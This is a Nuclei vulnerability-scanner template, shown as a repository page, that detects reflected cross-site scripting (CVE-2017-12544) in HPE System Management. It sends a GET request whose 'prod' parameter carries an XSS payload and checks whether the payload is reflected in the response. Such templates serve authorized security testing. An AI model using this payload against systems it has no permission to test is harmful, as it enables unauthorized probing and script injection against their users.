nuclei-templates/cves/2017/CVE-2017-12544.yaml

38 lines
911 B
YAML
Raw Normal View History

id: CVE-2017-12544
info:
name: HPE System Management - XSS
author: divya_mudgal
severity: medium
description: Reflected Cross-site scripting (XSS) on HPE System Management
2021-10-12 05:00:56 +00:00
reference:
- https://seclists.org/fulldisclosure/2018/Mar/5
- https://nvd.nist.gov/vuln/detail/CVE-2017-12544
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2017-12544
cwe-id: CWE-79
2021-10-12 05:00:56 +00:00
tags: cve,cve2017,xss,hp
requests:
- method: GET
path:
2021-10-12 05:00:56 +00:00
- "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"
matchers-condition: and
matchers:
- type: word
words:
2021-10-12 05:00:56 +00:00
- "var prodName = '';prompt`document.domain`;//';"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
2021-10-12 05:00:56 +00:00
- 200